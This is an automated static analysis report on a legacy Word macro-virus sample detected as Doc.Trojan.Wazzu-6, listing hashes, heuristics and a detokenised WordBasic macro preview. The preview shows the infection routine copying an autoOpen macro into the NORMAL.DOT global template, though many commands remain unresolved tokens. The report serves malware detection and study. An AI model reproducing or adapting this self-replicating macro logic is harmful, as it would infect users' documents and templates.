Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dc718e69cff8c1f9…

MALICIOUS

Office (OLE)

Size: 6.0 KB
First seen: 2012-06-14
MD5: bb62b70f290c816fb3ae2d22ea4651a3
SHA-1: a6fdb15a7b72752f2e28564e1d990cbdc5de392f
SHA-256: dc718e69cff8c1f96c1209ca186f1904811261ac81595b5a2534ff40da83112a
Risk score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers, specifically 'RSN MACRO VIRUS', and contains embedded text that repeats this marker and references 'Goat file'. This strongly indicates a malicious document intended for propagation, likely through macro execution. No specific payload or network activity was directly observed in the provided evidence.

Heuristics (3)

  • ClamAV: Doc.Trojan.Wazzu-6 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-6
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source (severity: info, rule: OLE_LEGACY_WORDBASIC_MACRO_SOURCE)
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 342 bytes
SHA-256: 60267a54428f661469c7e613ba0801d93caaefea8200e44e1f04e48af618577b

Preview script (first 1,000 lines of the extracted script):
MAIN
@cmd8178 "pmi.dot" , 1
, - * errCaught
@cmd0056
dlg @cmd0056
dlg
fileMacro$ = dlg = "\" = dlg @cmd0700 ":autoOpen"
globMacro$ = "Global:autoOpen"
MacroFile$ = @cmd80af @cmd8009 @cmd818e @cmd80b8 0 , 10
MacroFile$ = "NORMAL.DOT"
@cmd80c2 globMacro$ , fileMacro$
@cmd0054 = 1
@cmd80c2 fileMacro$ , globMacro$
Payload
* bye @cmd7468
, - * 0